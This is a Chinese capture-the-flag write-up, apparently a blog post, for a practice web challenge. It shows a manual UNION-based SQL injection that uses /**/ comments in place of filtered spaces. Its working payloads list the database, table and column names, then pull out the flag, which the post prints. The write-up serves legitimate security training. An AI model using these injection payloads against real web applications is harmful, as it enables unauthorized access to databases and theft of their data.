[CTF]简单的sql注入之2

本文详细介绍了在一个存在ID回显的Web应用中进行SQL注入的手工攻击过程。通过使用特殊字符绕过空格过滤,成功爆破数据库名、数据表名、字段名及最终的FLAG信息。案例展示了如何利用SQL注入获取敏感数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

类型:web
网址:http://www.shiyanbar.com/ctf/1908
攻击:sql注入
一句话总结:
id有回显的sql注入(手工)

Writeup:

测试发现过滤空格,用/**/代替空格

爆数据库名称:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果:web1

爆数据表名称:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/and/**/'1'='1

结果三个表,分别是baloteli、flag、web_1

爆flag表字段:

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='web1'/**/and/**/table_name='flag'/**/and/**/'1'='1

结果三个字段,分别是baloteli、flag、id

爆flag表flag字段的数据:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据,分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值